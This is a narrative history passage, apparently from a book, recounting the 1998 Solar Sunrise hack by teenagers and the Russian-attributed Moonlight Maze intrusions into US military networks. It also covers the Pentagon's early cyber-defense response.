ON February 3, 1998, the network monitors at the Air Force Information Warfare Center in San Antonio sounded the alarm: someone was hacking into a National Guard computer at Andrews Air Force Base on the outskirts of Washington, D.C.
Within twenty-four hours, the center’s Computer Emergency Response Team, probing the networks more deeply, detected intrusions at three other bases. Tracing the hacker’s moves, the team found that he’d broken into the network through an MIT computer server. Once inside the military sites, he installed a “packet sniffer,” which collected the directories of usernames and passwords, allowing him to roam the entire network. He then created a back door, which let him enter and exit the site at will, downloading, erasing, or distorting whatever data he wished.
The hacker was able to do all this because of a well-known vulnerability in a widely used UNIX operating system. The computer specialists in San Antonio had been warning senior officers of this vulnerability—Ken Minihan had personally repeated these warnings to generals in the Pentagon—but no one paid attention.
When President Clinton signed the executive order on “Critical Infrastructure Protection,” back in July 1996, one consequence was the formation of the Marsh Commission, but another—less noticed at the time—was the creation of the Infrastructure Protection Task Force inside the Justice Department, to include personnel from the FBI, the Pentagon (the Joint Staff and the Defense Information Systems Agency), and, of course, the National Security Agency.
By February 6, three days after the intrusion at Andrews Air Force Base was spotted, this task force was on the case, with computer forensics handled by analysts at NSA, DISA, and a unit in the Joint Staff called the Information Operations Response Cell, which had been set up just a week earlier as a result of Eligible Receiver. They found that the hacker had exploited a specific vulnerability in the UNIX systems, known as Sun Solaris 2.4 and 2.6. And so, the task force code-named its investigation Solar Sunrise.
John Hamre, the deputy secretary of defense who’d seen the Eligible Receiver exercise eight months earlier as the wake-up call to a new kind of threat, now saw Solar Sunrise as the threat’s fulfillment. Briefing President Clinton on the intrusion, Hamre warned that Solar Sunrise might be “the first shots of a genuine cyber war,” adding that they may have been fired by Iraq.
It wasn’t a half-baked suspicion. Saddam Hussein had recently expelled United Nations inspectors who’d been in Iraq for six years to ensure his compliance with the peace terms that ended Operation Desert Storm—especially the clause that barred him from developing weapons of mass destruction. Many feared that Saddam’s ouster of the inspectors was the prelude to resuming his WMD program. Clinton had ordered his generals to plan for military action; a second aircraft carrier was steaming to the Persian Gulf; American troops were prepared for possible deployment.
So when the Solar Sunrise hack expanded to more than a dozen military bases, it struck some, especially inside the Joint Staff, as a pattern. The targets included bases in Charleston, Norfolk, Dover, and Hawaii—key deployment centers for U.S. armed forces. Only unclassified servers were hacked, but some of the military’s vital support elements—transportation, logistics, medical teams, and the defense finance system—ran on unclassified networks. If the hacker corrupted or shut down these networks, he could impede, maybe block, an American military response.
Then came another unsettling report: NSA and DISA forensics analysts traced the hacker’s path to an address on Emirnet, an Internet service provider in the United Arab Emirates—lending weight to fears that Saddam, or some proxy in the region, might be behind the attacks.
The FBI’s national intelligence director sent a cable to all his field agents, citing “concern that the intrusions may be related to current U.S. military actions in the Persian Gulf.” At Fort Meade, Ken Minihan came down firmer still, telling aides that the hacker seemed to be “a Middle Eastern entity.”
Some were skeptical. Neal Pollard, a young DISA consultant who’d studied cryptology and international relations in college, was planning a follow-on exercise to Eligible Receiver when Solar Sunrise, a real attack, took everyone by surprise. As the intrusions spread, Pollard downloaded the logs, drafted briefings, tried to figure out the hacker’s intentions—and, the more he examined the data, the more he doubted that this was the work of serious bad guys.
In the exercise that he’d been planning, a Red Team was going to penetrate an unclassified military network, find a way in to its classified network (which, Pollard knew from advance probing, wasn’t very secure), hop on it, and crash it. By contrast, the Solar Sunrise hacker wasn’t doing anything remotely as elaborate: this guy would poke around briefly in one unclassified system after another, then get out, leaving behind no malware, no back door, nothing. And while some of the servers he attacked were precisely where a hacker would go to undermine the network of a military on the verge of deployment, most of the targets seemed selected at random, bearing no significance whatever.
Still, an international crisis was brewing, war might be in the offing; so worst-case assumptions came naturally. Whatever the hacker’s identity or motive, his work was throwing commanders off balance. They remembered Eligible Receiver, when they didn’t know they’d been hacked; the NSA Red Team had fed some of them false messages, which they’d assumed were real. This time around, they knew they were being hacked, and it wasn’t a game. They didn’t detect any damage, but how could they be sure? When they read a message or looked at a screen, could they trust—should they trust—what they were seeing?
This was the desired effect of what Perry had called counter command-control warfare: just knowing that you’d been hacked, regardless of its tangible effects, was disorienting, disrupting.
Meanwhile, the Justice Department task force was tracking the hacker twenty-four hours a day. It was a laborious process. The hacker was hopping from one server to another to obscure his identity and origins; the NSA had to report all these hops to the FBI, which took a day or so to investigate each report. At this point, no one knew whether Emirnet, the Internet service provider in the United Arab Emirates, was the source of the attacks or simply one of several landing points along the hacker’s hops.
Some analysts in the Joint Staff’s new Information Operations Response Cell noticed one pattern in the intrusions: they all took place between six and eleven o’clock at night, East Coast time. The analysts calculated what time it might be where the hacker was working: he might, it turned out, be on the overnight shift in Baghdad or Moscow, or maybe the early morning shift in Beijing.
One possibility they didn’t bother to consider: it was also after-school time in California.
By February 10, after just four days of sleuthing, the task force found the culprits. They weren’t Iraqis or “Middle Eastern entities” of any tribe or nationality. They were a pair of sixteen-year-old boys in the San Francisco suburbs, malicious descendants of the Matthew Broderick character in WarGames, hacking the Net under the usernames Makaveli and Stimpy, who’d been competing with their friends to hack into the Pentagon the fastest.
In one day’s time, FBI agents obtained authority from a judge to run a wiretap. They took the warrant to Sonic.net, the service provider the boys were using, and started tracking every keystroke the boys typed, from the instant they logged on through the phone line of Stimpy’s parents. Physical surveillance teams confirmed that the boys were in the house—eyewitness evidence of their involvement, in case a defense lawyer later claimed that the boys were blameless and that someone else must have hacked into their server.
Through the wiretap, the agents learned that the boys were getting help from an eighteen-year-old Israeli, an already notorious hacker named Ehud Tenenbaum, who called himself The Analyzer. All three teenagers were brazen—and stupid. The Analyzer was so confident in his prowess that, during an interview with an online forum called AntiOnline (which the FBI was monitoring), he gave a live demonstration of hacking into a military network. He also announced that he was training the two boys in California because he was “going to retire” and needed successors. Makaveli gave an interview, too, explaining his own motive. “It’s power, dude,” he typed out. “You know, power.”
The Justice Department task force was set to let the boys hang themselves a bit longer, but on February 25, John Hamre spoke to reporters at a press breakfast in Washington, D.C. Still frustrated with the military’s inaction on the broader cyber threat, he outlined the basic facts of Solar Sunrise (which, until then, had been kept secret), calling it “the most organized and systematic attack” on American defense systems to date. And he disclosed that the suspects were two teenagers in Northern California.
At that point, the FBI had to scramble before the boys heard about Hamre’s remarks and erased their files. Agents quickly obtained a search warrant and entered Stimpy’s house. There he was, in his bedroom, sitting at a computer, surrounded by empty Pepsi cans and half-eaten cheeseburgers. The agents arrested the boys while carting off the computer and several floppy disks.
Stimpy and Makaveli (whose real names were kept under seal, since they were juveniles) were sentenced to three years probation and a hundred hours of community service; they were also barred from going on the Internet without adult supervision. Israeli police arrested Tenenbaum and four of his apprentices, who were all twenty years old; he served eight months in prison, after which he started an information security firm, then moved to Canada, where he was arrested for hacking into financial sites and stealing credit card numbers.
At first, some U.S. officials were relieved that the Solar Sunrise hackers turned out to be just a couple of kids—or, as one FBI official put it in a memo, “not more than the typical hack du jour.” But most officials took that as the opposite of reassurance: if a couple of kids could pull this off, what could a well-funded, hostile nation-state do?
They were about to find out.
In early March, just as officials at NSA, DISA, and the Joint Staff’s Information Operations Response Cell were closing their case files on Solar Sunrise and going back to their workaday tasks, word came through that someone had hacked into the computers at Wright-Patterson Air Force Base, in Ohio, and was pilfering files—unclassified but sensitive—on cockpit design and microchip schematics.
Over the next few months, the hacker fanned out to other military facilities. No one knew his location (the hopping from one site to another was prodigious, swift, and global); his searches bore no clear pattern (except that they involved high-profile military R&D projects). The operation was a sequel of sorts to Solar Sunrise, though more elaborate and puzzling; so, just as night follows day, the task force called it Moonlight Maze.
Like the Solar Sunrise gang, this hacker would log in to the computers of university research labs to gain access to military sites and networks. But in other ways, he didn’t seem at all like some mischievous kid on a cyber joyride. He didn’t dart in and out of a site; he was persistent; he was looking for specific information, he seemed to know where to find it, and, if his first path was blocked, he stayed inside the network, prowling for other approaches.
He was also remarkably sophisticated, employing techniques that impressed even the NSA teams that were following his moves. He would log on to a site, using a stolen username and password; when he left, he would rewrite the log so that no one would know he’d ever been there. Finding the hacker was touch-and-go: the analysts would have to catch him in the act and track his moves in real time; even then, since he erased the logs when exiting, the on-screen evidence would vanish after the fact. It took a while to convince some higher-ups that there had been an intrusion.
A year earlier, the analysts probably wouldn’t have detected a hacker at all, unless by pure chance. About a quarter of the servers in the Air Force were wired to the network security monitors in San Antonio; but most of the Army, Navy, and civilian leaders in the Pentagon would have had no way of knowing whether an intruder was present, much less what he was doing or where he was from.
That all changed with the one-two-three punch of Eligible Receiver, the Marsh Commission Report, and Solar Sunrise—which, over a mere eight-month span, from June 1997 to February 1998, convinced high-level officials, even those who had never thought about the issue, that America was vulnerable to a cyber attack and that this condition endangered not only society’s critical infrastructure but also the military’s ability to act in a crisis.
Right after Eligible Receiver, John Hamre called a meeting of senior civilians and officers in the Pentagon to ask what could be done. One solution, a fairly easy gap-filler, was to authorize an emergency purchase of devices known as intrusion-detection systems or IDS—a company in Atlanta, Georgia, called Internet Security Systems, could churn them out in quantity—and to install them on more than a hundred Defense Department computers. As a result, when Solar Sunrise and Moonlight Maze erupted, far more Pentagon personnel saw what was happening, far more quickly, than they otherwise would have.
Not everyone got the message. After Eligible Receiver, Matt Devost, who’d led the aggressor team in war games testing the vulnerability of American and allied command-control systems, was sent to Hawaii to clean up the networks at U.S. Pacific Command headquarters, which the NSA Red Team had devastated. Devost found gaps and sloppiness everywhere. In many cases, software vendors had long ago issued warnings about the vulnerabilities along with patches to fix them; the user had simply to push a button, but no one at PacCom had done even that. Devost lectured the admirals, all of them more than twice his age. This wasn’t rocket science, he said. Just put someone in charge and order him to install the repairs. When Solar Sunrise erupted, Devost was working computer forensics at the Defense Information Systems Agency. He came across PacCom’s logs and saw that they still hadn’t fixed their problems: despite his strenuous efforts, nothing had changed. (He decided at that point to quit government and do computer-attack simulations in the private sector.)
Even some of the officers who’d made the changes, and installed the devices, didn’t understand what they were doing. Six months after the order went out to put intrusion-detection systems on Defense Department computers (still a few weeks before Solar Sunrise), Hamre called a meeting to see how the devices were working.
An Army one-star general furrowed his brow and grumbled that he didn’t know about these IDS things: ever since he’d put them on his computers, they were getting attacked every day.
The others at the table suppressed their laughter. The general didn’t realize that his computers might have been getting hacked every day for months, maybe years; all the IDS had done was to let him know it.
Early on in Solar Sunrise, Hamre called another meeting, imbued with the same sweat of urgency as the one he’d called in the wake of Eligible Receiver, and asked the officers around him the same question he’d asked before: “Who’s in charge?”
They all looked down at their shoes or their notepads, because, in fact, nothing had changed; no one was still in charge. The IDS devices may have been in place, but no one had issued protocols on what to do if the alarm went off or how to distinguish an annoying prank from a serious attack.
Finally, Brigadier General John “Soup” Campbell, the commander of the secret J-39 unit, who’d been the Joint Staff’s point man on Eligible Receiver, raised his hand. “I’m in charge,” he said, though he had no idea what that might mean.
By the time Moonlight Maze started wreaking havoc, Campbell was drawing up plans for a new office called Joint Task Force-Computer Network Defense—or JTF-CND. Orders to create the task force had been signed July 23, and it had commenced operations on December 10. It was staffed with just twenty-three officers, a mix of computer specialists and conventional weapons operators who had to take a crash course on the subject, all crammed into a trailer behind DISA headquarters in the Virginia suburbs, not far from the Pentagon. It was an absurdly modest effort for an outfit that, according to its charter, would be “responsible for coordinating and directing the defense of DoD computer systems and computer networks,” including “the coordination of DoD defensive actions” with other “government agencies and appropriate private organizations.”
Campbell’s first steps would later seem elementary, but no one had ever taken them—few had thought of them—on such a large scale. He set up a 24/7 watch center, established protocols for alerting higher officials and combatant commands of a cyber intrusion, and—the very first step—sent out a communiqué, on his own authority, advising all Defense Department officials to change their computer passwords.
By that point, Moonlight Maze had been going on for several months, and the intruder’s intentions and origins were still puzzling. Most of the intrusions, the ones that were noticed, took place in the same nine-hour span. Just as they’d done during Solar Sunrise, some intelligence analysts in the Pentagon and the FBI looked at a time zone map, did the math, and guessed that the attacker must be in Moscow. Others, in the NSA, noted that Tehran was in a nearby time zone and made a case for Iran as the hacker’s home.
Meanwhile, the FBI was probing all leads. The hacker had hopped through the computers of more than a dozen universities—the University of Cincinnati, Harvard, Bryn Mawr, Duke, Pittsburgh, Auburn, among others—and the bureau sent agents to interview students, tech workers, and faculty on each campus. A few intriguing suspects were tagged here and there—an IT aide who answered questions nervously, a student with a Ukrainian boyfriend—but none of the leads panned out. The colleges weren’t the source of the hack; like the Lawrence Berkeley computer center in Cliff Stoll’s The Cuckoo’s Egg, they were merely convenient transit points from one target site to another.
Finally, three breakthroughs occurred independently. One was inspired by Stoll’s book. Stoll had captured the East German hacker a dozen years earlier by creating a “honey pot”—a set of phony files, replete with directories, documents, usernames, and passwords (all of Stoll’s invention), seemingly related to the American missile-defense program, a subject of particular interest to the hacker. Once lured to the pot, he stayed in place long enough for the authorities to trace his movements and track him down. The interagency intelligence group in charge of solving Moonlight Maze—mainly NSA analysts working under CIA auspices—decided to do what Stoll had done: they created a honey pot, in this case a phony website of an American stealth aircraft program, which they figured might lure their hacker. (Everyone in the cyber field was enamored of The Cuckoo’s Egg; when Stoll, a long-haired Berkeley hippie, came to give a speech at NSA headquarters not long after his book was published, he received a hero’s welcome.) Just as in Stoll’s scheme, the hacker took the bait.
But with their special access to exotic tools, the NSA analysts took Stoll’s trick a step further. When the hacker left the site, he unwittingly took with him a digital beacon—a few lines of code, attached to the data packet, which sent back a signal that the analysts could follow as it piggybacked through cyberspace. The beacon was an experimental prototype; sometimes it worked, sometimes it didn’t. But it worked well enough for them to trace the hacker to an IP address of the Russian Academy of Sciences, in Moscow.
Some intelligence analysts, including at NSA, remained skeptical, arguing that the Moscow address was just another hopping point along the way to the hacker’s real home in Iran.
Then came the second breakthrough. While Soup Campbell was setting up Joint Task Force-Computer Network Defense, he hired a naval intelligence officer named Robert Gourley to be its intel chief. Gourley was a hard-driving analyst with a background in computer science. In the waning days of the Cold War, he’d worked in a unit that fused intelligence and operations to track, and aggressively chase, Russian submarines. He’d learned of this fusion approach, five years earlier, at an officers’ midcareer course taught by Bill Studeman and Rich Haver—the intelligence veterans who, a decade earlier, under the tutelage of Admiral Bobby Ray Inman, had pushed for the adoption of counter command-control warfare.
Shortly before joining Campbell’s task force, Gourley attended another conference, this one lasting just a day, on Navy operations and intelligence. Studeman and Haver happened to be among the lecturers. Gourley went up to them afterward to renew his acquaintance. A few weeks later, ensconced in his task force office, he phoned Haver on a secure line, laid out the Moonlight Maze problem, as well as the debate over the intruder’s identity, and asked if he had advice on how to resolve it.
Haver recalled that, during the Cold War, the KGB or GRU, the Soviet military’s spy agency, often dispatched scientists to international conferences to collect papers on topics of interest. So Gourley assembled a small team of analysts from the various intelligence agencies and scoured the logs of Moonlight Maze to see what topics interested this hacker. The swath, it turned out, covered a bizarrely wide range: not just aeronautics (the topic of his first search, at Wright-Patterson) but also hydrodynamics, oceanography, the altimeter data of geophysical satellites, and a lot of technology related to surveillance imagery. Gourley’s team then scanned databanks of recent scientific conferences. The matchup was at least intriguing: Russian scientists had attended conferences on every topic that attracted the hacker.
That, plus the evidence from the honey pot and the absence of signs pointing to Iran or any other Middle Eastern source, led Gourley to conclude that the culprit was Russia. It was a striking charge: a nation-state was hacking American military networks—and not just any nation-state, but America’s former enemy and now, supposedly, post–Cold War partner.
Gourley brought his finding to Campbell, who was shocked. “Are you saying that we’re under attack?” he asked. “Should we declare war?”
“No, no,” Gourley replied. This was an intelligence assessment, though he added that he had “high confidence” in its accuracy.
The third intelligence breakthrough was the firmest but also the newest, the one that relied on methods unique to the cyber age and thus mastered by only a few fledgling specialists. Kevin Mandia was part of a small cyber crime team at the Air Force Office of Special Investigations. He’d visited the Air Force Information Warfare Center in San Antonio several times and had kept up with its network security monitoring system. When Moonlight Maze got started, Mandia, by now a private contractor, was sent to the FBI task force to review the hacker’s logs. The hacker was using an obfuscated code; Mandia and his team wrote new software to decrypt the commands—and it turned out they’d been typed in Cyrillic. Mandia concluded that the hacker was Russian.I
For the first several months of Moonlight Maze, the American intelligence agencies stopped short of making any statement, even informally, about the hacker’s origins. But the convergence of the Stoll-inspired honey pot, Bob Gourley’s analysis, and Kevin Mandia’s decryption—the fact that such disparate methods sired the same conclusion—changed the picture. It was also clear by now that the Moonlight Maze hackers, whoever they were, had pulled in quite a haul: 5.5 gigabytes of data, the equivalent of nearly three million sheets of paper. None of it was classified, but quite a lot of it was sensitive—and might add up to classified information if a smart analyst pieced it all together.
For nearly a year, an FBI-led task force—the same interagency task force that investigated Solar Sunrise—had coordinated the interagency probe, sharing all intelligence and briefing the White House. In February, John Hamre testified on the matter in closed hearings. Days later, the news leaked to the press, including the finding that the hackers were Russian.
At that point, some members of the task force, especially those from the FBI, proposed sending a delegation to Moscow and confronting Russian officials head-on. It might turn out that they had nothing to do with the hacking (Hamre had testified that it was unclear whether the hackers were working in the government), in which case the Kremlin and the security ministries would want to know about the renegade in their midst. Or maybe the Russian government was involved, in which case that would be worth knowing, too.
Task force members from the Pentagon and NSA were leery about going public. Maybe the Russians hadn’t read the news stories, or maybe they had but dismissed the reports as untrue; in other words, maybe the Russians still didn’t know we were on to them, that we were hacking their hacker. Meanwhile, we were learning things about their interests and operational style; an official confrontation could blow the operation.
In the end, the White House approved the FBI’s request to send a delegation. The task force then spent weeks discussing what evidence to let the Russians see and what evidence to withhold. In any case, it would be presented to the Russians in the same terms as the FBI officially approached it—not as a matter of national security or diplomacy, but rather as a criminal investigation, in which the United States was seeking assistance from the Russian Federation.
The delegation, formally called the Moonlight Maze Coordination Group, consisted of four FBI officials—a field agent from the Baltimore office, two linguists from San Francisco, and a supervisor from headquarters—as well as a NASA scientist and two officers from the Air Force Office of Special Investigations, who had examined the hacker’s logs with Kevin Mandia. They flew to Moscow on April 2, bringing along the files from five of the cyber intrusions, with plans to stay for eight days.
This was the era of warm relations between Bill Clinton and Russia’s reform president, Boris Yeltsin, so the group was received in a spirit of celebration, its first day in Moscow filled with toasts, vodka, caviar, and good cheer. They spent the second day at the headquarters of the Russian defense ministry in a solid working session. The Russian general who served as the group’s liaison was particularly cooperative. He brought out the logs on the files that the Americans had brought with them. This was confirmation: the Russian government had been the hacker, working through servers of the academy of sciences. The general was embarrassed, putting blame on “those motherfuckers in intelligence.”
As a test, to see whether this might be a setup, one of the Air Force investigators on the trip mentioned a sixth intrusion, one whose files the group hadn’t brought with them. The general brought out those logs, too. This is criminal activity, he bellowed to his new American friends. We don’t tolerate this.
The Americans were pleased. This was working out extraordinarily well; maybe the whole business could be resolved through quiet diplomacy and a new spirit of cooperation.
On the third day, things took a shaky turn. Suddenly, the group’s escorts announced that it would be a day of sightseeing. So was the fourth day. On the fifth day, no events were scheduled at all. The Americans politely protested, to no avail. They never again stepped foot inside the Russian defense ministry. They never again heard from the helpful general.
As they prepared to head back to the States, on April 10, a Russian officer assured them that his colleagues had launched a vigorous investigation and would soon send the embassy a letter outlining their findings.
For the next few weeks, the legal attaché in the American embassy phoned the Russian defense ministry almost every day, asking if the letter had been written. He was politely asked to be patient. No letter ever arrived. And the helpful general seemed to have vanished.
Back in Washington, a task force member cautioned against drawing sour conclusions. Maybe, he said, the general was just sick.
Some members from the Pentagon and the intelligence agencies, who’d warned against the trip, rolled their eyes. “Yeah,” Bob Gourley scoffed, “maybe he has a case of lead poisoning.”
The emerging consensus was that the general hadn’t known about the hacking operation, that he’d genuinely believed some recalcitrant agents in military intelligence were engaged in skullduggery—until his superiors excoriated him, possibly fired him or worse, for sharing secrets with the Americans.
One good thing came out of the trip: the hacking did seem to stop.
Then, two months later, Soup Campbell’s Joint Task Force-Computer Network Defense detected another round of hacking into sensitive military servers—these intrusions bearing a slightly different signature, layered with codes that were harder to break.
The cat-and-mouse game was back on. And it was a game where both sides, and soon other nations, played cat and mouse. To an extent known by only a few American officers, still fewer political higher-ups, and no doubt some Russian spies, too, the American cyber warriors were playing offense as well as defense—and had been for a long while.
I. In 2006, Mandia would form a company called Mandiant, which would emerge as one of the leading cyber security incident consultants, rising to prominence in 2011 as the firm that identified a special unit of the Chinese army as the hacker behind hundreds of cyber attacks against Western corporations.